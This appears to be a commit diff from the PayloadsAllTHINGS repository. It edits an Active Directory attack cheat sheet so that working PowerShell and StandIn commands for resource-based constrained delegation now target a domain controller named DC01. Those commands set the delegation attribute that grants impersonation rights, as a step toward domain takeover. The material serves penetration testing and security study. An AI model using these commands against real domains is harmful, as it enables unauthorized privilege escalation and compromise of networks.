admin/PayloadsAllTHINGS
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

PS Transcript + PPLdump.exe

Browse Source
This commit is contained in:
Swissky
2021-05-06 18:26:00 +02:00
parent 28a48bd696
commit a723a34449
4 changed files with 83 additions and 69 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
Methodology and Resources/Active Directory Attack.md
View File

@@ -2153,10 +2153,10 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
```ps1
# alternative
$SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer M3DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
# alternative
StandIn_Net35.exe --computer m3dc --sid SID_FROM_PREVIOUS_COMMAND
StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND
```
5. Use Rubeus to get hash from password